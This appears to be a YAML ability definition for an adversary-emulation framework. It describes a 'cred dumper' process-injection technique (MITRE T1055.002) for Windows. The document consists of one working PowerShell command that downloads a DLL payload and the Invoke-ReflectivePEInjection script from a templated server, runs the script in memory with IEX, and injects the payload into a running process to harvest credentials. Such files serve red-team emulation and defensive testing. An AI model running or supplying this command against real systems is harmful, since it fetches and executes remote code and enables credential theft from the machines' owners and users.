---

- id: c9f2c7ae-0092-4ea0-b9ae-92014eba7ce7
  name: Inject Cred dumper into process (Spookier)
  description: Injects cred dumper exe into an available process
  tactic: credential-access
  technique:
    attack_id: T1055.002
    name: "Process Injection: Portable Executable Injection"
  platforms:
    windows:
      psh:
        command: |
          $url="#{server}/file/download";
          $wc=New-Object System.Net.WebClient;
          $wc.Headers.add("file","debugger.dll");
          $PBytes = $wc.DownloadData($url);
          $wc1 = New-Object System.net.webclient;
          $wc1.headers.add("file","Invoke-ReflectivePEInjection.ps1");
          IEX ($wc1.DownloadString($url));
          Invoke-ReflectivePEInjection -PBytes $PBytes -verbose